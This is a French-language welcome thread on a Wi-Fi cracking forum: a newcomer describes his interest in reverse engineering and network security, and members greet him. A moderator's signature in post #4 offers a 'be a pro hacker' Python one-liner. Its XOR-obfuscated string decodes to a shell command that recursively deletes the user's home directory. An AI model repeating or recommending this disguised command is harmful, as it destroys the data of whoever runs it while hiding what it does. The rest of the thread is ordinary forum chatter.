Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 07-06-2011 16:39:50

MIG
Membre

un nouveau membre vous dit bonjours

bonjours à tous et merci pour la mine d'infos dispo sur le site
je me présente ...
"mig" 44 ans passionne depuis déjà quelque temps pas l'informatique dans sa version pure
j'ai commence il y a 4 ans environs le reverse engineering sous window (avec un niveau convenable)et la programmation  allant de paire  en .net (avec un niveau plutôt faible)
bien que n'ayant pas encore fait le tour du sujet une certaine lassitude me pousse vers votre univers
la sécurité réseau et le petit monde du pingouin smile
la mon niveau rase les pâquerettes mais je ne demande qu'à apprendre
ma première motivation et de coder un tool bbox en .net (malgré que je pense qu'il ne présentera aucun intérêt
le hash sha1 sur le brute force num de serie sera probablement beaucoup plus lent que sur le tool existant )
mais pour le fun smile
la deuxième une question du forum sur le weptool club internet sous windows qui n'a a première vu pas de réponse  (alors qu'elle est si simple)
la dernière avant les prochaines DECOUVRIR LINUX
ah oui j’oubliai je suis actuellement connecté sur la box de mon voisin livebox inventel wpa (avec son autorisation)
ma box ayant cramée par la foudre ...:rolleyes: de toute manière dans l’immédiat je serais bien incapable de la lui "pirater" .
voila j’attends avec impatience ma box sfr pour me lancer dans les différents tutos
a très bientôt sur d'autres sujets

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 07-06-2011 16:50:54

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Re : un nouveau membre vous dit bonjours

Salut MIG et bienvenue sur le forum smile

#3 07-06-2011 17:10:56

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Plop MIG, bienvenue parmi nous.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#4 07-06-2011 20:04:18

spawn
Modérateur

Bienvenue sur la banquise !

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#5 08-06-2011 20:23:52

algerino
Membre d'Or

Bienvenue sur le fofo MIG ! on te souhaite une agréable navigation big_smile

Le silence est une sagesse mais rare sont ceux qui le pratiquent by Prophète Mohammed (saws)

#6 08-06-2011 22:32:36

toto
Membre V.I.P.
Lieu : chez le docteur aussi

bienvenue man

Annonce